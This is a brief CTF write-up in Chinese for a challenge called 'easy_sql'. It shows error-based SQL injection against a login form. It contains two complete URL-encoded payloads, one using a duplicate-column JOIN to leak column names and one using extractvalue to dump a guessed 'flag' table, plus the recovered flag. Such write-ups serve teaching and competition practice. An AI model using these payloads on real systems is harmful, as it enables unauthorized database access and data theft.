easy_sql
报错注入,盲猜flag表,但不知道名称,用重复column名爆列名
参考:无列名注入小记
1 | uname=%27)/**/||/**/(select/**/1/**/from/**/flag/**/where(select/**/*/**/from(select/**/*/**/from/**/flag/**/as a/**/join/**/flag/**/as/**/b/**/using(id,no))as/**/c))/**/or/**/('1&passwd=1&Submit=%E7%99%BB%E5%BD%95 |
1 | uname=%27)/**/and/**/extractvalue(1,concat(0x7e,(select/**/substr(`e691d77e-5da1-409b-a37b-ff4edfa14123`,31)/**/from/**/flag),0x7e))/**/and/**/('0&passwd=1&Submit=%E7%99%BB%E5%BD%95 |
读出flag CISCN{9fO5F-WC2YL-GY3zM-R4aIu-kAjxU-}